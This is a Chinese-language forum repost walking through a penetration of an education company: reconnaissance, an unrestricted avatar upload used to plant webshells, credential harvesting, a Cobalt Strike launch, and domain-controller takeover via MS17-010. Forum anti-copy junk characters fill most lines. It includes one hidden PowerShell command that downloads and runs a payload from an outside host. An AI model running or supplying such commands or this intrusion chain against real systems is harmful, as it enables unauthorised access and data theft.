|
2 `8 C6 O" W% N' Y- G! M, \ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路0 ^4 K( C% p J" R$ o6 Y" j
8 O4 ?2 h; j" _8 N& L
) M9 d( }4 d+ F, b
" B5 Y5 ]9 u$ `+ z( p8 n. J
# o- q6 X* V' @" g
$ ~3 n- j+ b9 O- P6 u 正文+ y( l9 v/ r. R2 ]5 C
, R' J- l7 E2 O D1 Z+ P8 s% ?9 X! V* O# l, O% G
2 O6 ?: j6 O* ]5 c; z; h" p3 K2 A: ^ ; s* ]# r! s+ a& I0 ^$ `" z9 a. W
/ ^7 Z& O9 I0 B 目标:www.xxxx.com(一家教育机构)
5 B/ b* ^9 P; D- S8 [* u# D; K9 l打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能" {% `$ Y2 b; u: x) g# F {5 G9 f; j1 Z
* k& a) R9 F4 ~3 j& {3 h
8 [2 g9 I& B- q, W9 x( }3 G  / r- X8 D5 ~% a: @/ y! n4 s8 O& H
+ w4 |7 Y2 k$ C; C7 n$ l8 T7 x+ g/ U: ^5 b% ?3 e
进行了简单的信息搜集
5 T9 M" M- j$ J: _% b
1 e3 f* z! B5 w* A; p8 k9 B! b
" S$ Z' t7 \ Y8 E4 [
' n; _& n% K1 |) M* H3 N6 ~; p, o6 |4 z [" r
子域名搜集* f) M9 ]% V0 p f2 f
0 p% Z, Q- s& A& L1 O- Q
# c& ~8 q- V. w0 c 
6 K0 i& B& B* m0 k; c5 u
1 m: Q J/ v4 [* Q' L. A# G- R f: o: [" A
fofa找资产
4 X; t5 C" z/ z
" H7 _8 u0 X" q2 {7 H5 a, U" d/ ]( ~! I3 n" T1 y: b
7 @( b4 C8 O6 O
3 \: l) @0 d" W" E& `
 2 @" a( x- E+ Y( I4 Z+ k# T
& d1 ^# ?7 P! L* N( `, J0 X3 y/ D, f, b
一共七个资产。去重之后只有两个。
; K% n: [$ V/ U9 L1 }' I$ g
+ d( Q, ?- P: e9 m4 n2 t
/ `' }+ u0 o) Q# u3 n9 ^& e/ u6 x' ~ & k+ F4 a6 i7 h- [9 p5 r, J1 C+ T
+ B. Y+ n( }* Q
目录探测1 W3 c5 f* L. ~" g* c# v7 H
2 r4 j/ d, ]( {. p# V' [- `- t
5 f/ w2 d: o4 E
 % c8 a3 ~2 s2 [1 I8 D6 {- s
7 s. b. R& ^; U: A5 s8 i
$ k' z! m0 c5 A5 i3 t. W( S
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& d6 }0 O" m# T
K F {: n5 q4 K6 T/ K( m+ {' v9 k$ D T1 J: [/ R4 A2 l( ~, Q
% H& a3 E8 N: T1 j! G( E# Q
: @' {) L# K" s0 Y6 t 我又尝试了通过修改返回包来绕过登录界面
7 S% m! z. t* C7 o. E
/ }+ n0 w& L+ f% k0 {# j( L- \1 o) r" O( A# s+ y
0 a' W2 p& k; ? 5 S" S# q0 Q. L! c) D
4 G! O5 F2 A5 _5 Q
还是不行,尝试注入无果7 l0 H% z+ P2 Z: Y7 ^/ c' s6 L( `# a
A$ ^- Z: D+ B: |! `: t9 v$ J
! y7 W. }' w5 e$ d" z8 f7 ^/ j
3 Y4 b$ B( Q1 L& Q9 z # t1 W- t% _ y, N/ L( P1 ]
0 {1 U* @0 e7 _( r7 |! c4 ?7 z: l
不过我目录探测出了一处Spring信息泄露
- {/ a' x* k! f5 z$ A
^" r. N$ ?4 K1 @% P8 K, k
' p* I/ ]6 I9 V3 W( h! O
. l5 O# C; g2 Y V8 t! k3 `- |+ ~! r: W
 . r. o( f! ^; _ J/ P" b2 ^/ ]. N
]/ q) ]* I! h, {$ Z% M. {
$ I, u4 m# x7 r# Z ?: S4 B/ m6 {0 H
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
, f. |1 T* d* c) p% ^3 I9 ]; K2 L
K: S6 S5 |* e3 w9 T+ P8 l% l4 o6 {
z8 P. u, @2 x8 ~$ ?6 p" _) R 
4 r+ t* `' [" [, s
8 P1 p) X" ^3 i9 C; |# N* ^2 d/ c# }0 Y3 s( J" E I% z2 C# w
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
. m7 B1 P' N9 R7 d( d3 t+ y
6 Q( z- n$ p* s! p3 M0 I6 X
: P( w! `- l# p/ {* y 
( z/ S, I! |8 _8 f+ Y
6 B$ B+ x- G5 ?" v" s0 V* d) ~- R" D- M0 \
获取有些师傅到这一步就手机抓包电脑测了。
& L. n6 E( o4 r1 `
+ P' O6 L9 H( B; Z! P" I; I0 c9 h! e/ q
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。9 E* d1 V7 `' ?
+ [. c' j# L3 {/ n1 L+ ^' [
+ k% M* @& _$ c/ u 其中在一个公众号发现了小程序,可以进行注册。
; B/ O8 z. a7 g5 o, z4 Q% D/ g ; n% ]" l# `( b+ q( F0 O
6 r& h5 |+ ^, S0 X
看到了头像上传,尝试上传获取WebShell
5 n; f a# G* @0 Z1 w, m) Z
N" z4 t; w7 S! f" V' M" R% S
9 v( {$ r' Y+ J1 A3 F$ g  ! M/ x4 f9 n1 ?0 J x1 s: a* N
: W- T7 t/ s. W4 F* y9 y: E
. E9 p( u7 y/ Y 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问/ Y; v5 X9 J! B6 I
: s% f& ~% p4 j* j
4 r, ~# v2 }! O. a6 U
, d: e8 z+ F- i. t+ U, ?" v% z
' V8 {* m" ^# z+ s* v4 I5 ~! o }3 G
5 D) M" Y3 M0 q4 {6 I: q- m 然后上了大马, I, I6 i' |# ~. Y
) ~/ p E: @+ u2 d4 b' s1 M3 S
2 e+ g7 \( q, _; S" T2 X
 : ^- |7 G! d. p* u6 i
" c+ b- c1 R" @( w; P5 D
6 g* j4 a4 A2 Y- ?5 u9 g
5 s8 B8 l: r1 Q4 T" F$ w" \8 M 0 _ N3 ^7 g. L$ H6 P% [
* k: t, ~4 I& C3 j/ T
通过翻找文件发现数据库账号密码
Q) {& F3 t5 y
: ]! H% Z4 ]) o1 i& [# X5 s0 b2 p4 c+ R4 o* D! y$ ~( @
 9 g3 b) C: a" _3 t& P1 n" q
2 O% O7 z5 z2 l+ J- q. u
3 y; z( G7 X, ~ C: e --内网渗透
, D$ D6 t t) A/ g/ r. O / D$ S; l' n# d
5 L. P3 l( h; J% z$ q
直接通过powershell执行 cs上线# ], M! d# D- j- v/ u0 M+ {
" r% n$ b6 I9 I/ G% j
3 t+ E; I" }8 c7 _; r0 J. F' {+ O powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"+ w6 q' W4 V# l1 ~- C9 a* I
. {4 @" B! {+ @% V5 X4 x; o+ K5 p
& \7 I2 z K4 r. m/ b1 Q  ( Y7 J8 K3 a6 ^ g. r' R" A
% F9 N- s$ \2 k# x- }: N1 M3 M$ S' ]* K" Q. \
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破6 H; o; y2 O* h- k/ a
" D8 V# K6 K% l. a
3 d& f; g8 f; t$ ^: `3 ] 
8 @( ^: M V) w. ^; J# G* y ! ?0 [8 p4 Z% B* g" o8 N' l
' g5 Z( L) D5 ^& S0 W
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
) y3 e( p( G7 l- l5 l- o3 I. F
( U8 o! V4 p0 m2 t& ]+ K/ n& H
8 z+ b, [% i4 e
. y% p6 G7 Z: B L; E/ T ) J3 F- b( ^ y$ `, V7 j/ E
$ m+ y4 R! j0 [
 0 b& {6 w1 o, k' A4 N
+ m$ }& v" `" L" f' B5 D
. p. o* o6 |, c) Q& s5 U; e/ M
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, ]! ~* E2 u! b+ Q4 {, W2 b
5 s. H, U0 g& u, @& s$ J# J! _. [ V$ ^8 I- v
# a3 s1 J* p' i. S/ l
0 ]# q' w' o6 i% z: Y0 C. x1 j5 n) f 
/ F- T+ d3 X& A5 J1 L
L) O0 C, G2 i8 ^: r
7 N; A; |9 S0 Z8 D
. S/ N% p/ z1 _0 q7 n
0 u* w+ j4 s; j* h- x
* w5 p$ q- d( d9 h
+ R4 ?1 d% S+ A s* A# Y( g+ E1 @* R5 Q8 k" I8 b1 Y6 N: S
( p! x) V$ X7 ^
2 o1 U4 w; k7 r0 G; Z! x! f
( P( p, `1 J/ P+ h1 e, ^% P 小结
6 ~: w! Z! K# j $ f! Y4 @# {' s
& Z3 e B' a- Z6 ~" R ( o! L, L' h2 @3 b% g% a# j; m# [
/ T( y' }# V. l5 n# C
$ C2 O9 }5 m& _1 N+ J 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!$ H7 Z$ }4 U; r
: ~4 r$ I( A4 _; Y2 o) H) Y* [$ C7 ^1 @
5 C/ u- Z7 n6 Q8 U; o+ l/ ?
" e2 B: p( M" C! |. S g _- A4 @" c1 @
-
. R& Z/ K# K8 X- g . J: Q# y( [; W/ V1 M
# h3 Z: a- x( V
- * K( \" A/ H7 k- O3 E
' M! X5 `; G# k/ U* p, _3 V: n- b9 c
! `! v ? [" Z$ Z
' c' P- C7 D% S8 m9 I/ V3 p( P q9 y; b4 T7 O" ^5 A/ z
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
! ]! t% A2 o% H: R: x . t2 H; Z9 Q2 c# \0 U$ p8 t* P
2 u/ V' J8 n; o2 r* Q" c
: c6 ]& c% j1 y* s9 }5 n0 T, t+ U0 W
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对